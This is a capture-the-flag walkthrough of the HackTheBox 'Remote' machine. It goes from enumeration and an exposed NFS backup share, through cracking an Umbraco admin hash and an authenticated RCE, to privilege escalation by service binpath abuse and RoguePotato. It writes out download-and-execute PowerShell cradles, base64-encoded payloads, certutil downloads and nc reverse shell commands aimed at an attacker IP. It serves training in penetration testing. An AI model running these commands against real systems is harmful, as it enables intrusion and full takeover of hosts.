# HackTheBox - Remote
### Nmap scan results
```csharp
nmap -p- -A -T4 -oA nmap-remote 10.10.10.180
```
Let's enumerate the FTP Server and see if we can get any **`sensitive/conf`** files.
### Enumerating webserver (Microsoft HTTPAPI)
There's a [Umbraco ](https://umbraco.com/)CMS (Content Management System) running and we can search for potential exploits, but first we will run a gobuster scan in the background.
> Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.
```csharp
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50
```
**There are certain exploits available for this CMS but we need to enumerate the version used.**
### Mounting the [NFS ](https://www.datto.com/blog/what-is-nfs-file-share)Share
{% hint style="info" %}
**NFS**, or Network File System, is a collaboration system developed by Sun Microsystems in the early 80s that allows users to view, store, update or **share** files on a remote computer as though it was a local computer.
{% endhint %}
```csharp
mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock
```
So the configuration file for Umbraco CMS is stored in **`Umbraco.sdf`** file which contains the usernames and passwords. The file is located at **`App_data/Umbraco.sdf`**
I actually ran **strings** on Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used. Check **`Web.config`** file
Get the SHA-1 hash for admin and crack it using **John** or **hashcat**.
Now that we have credentials, we can try to exploit that **`(Authenticated) Remote Code Execution`**
### Exploiting Umbraco's RCE (Authenticated)
This is the vulnerable page at **`http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx`**
```markup
public string xml()
{
string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "";
proc.StartInfo.Arguments = cmd;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start(); string output = proc.StandardOutput.ReadToEnd();
return output;
}
```
### Using [nishang's](https://github.com/samratashok/nishang/tree/master/Shells) powershell script to get a reverse shell
```c
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"
```
### Running winpeas.exe (Privilege Escalation)
```c
certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe
```
> If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:
{% embed url="" %}
```bash
sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config binpath= "net localgroup administrators username /add"
sc config binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
```
```bash
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
```
```bash
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AY
QBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc
```
### Trying Rogue Potato Attack
{% embed url="" %}
Download the exploit from [here ](https://github.com/antonioCoco/RoguePotato/releases/tag/1.0)and transfer it to the target machine using **`certutil.exe`**
```cpp
certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe
```
The exploit doesn't work without providing **CLSID**, we can get **CLSID** for UsoSvc service from [here](http://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise/).
> A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.
```cpp
.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"
```
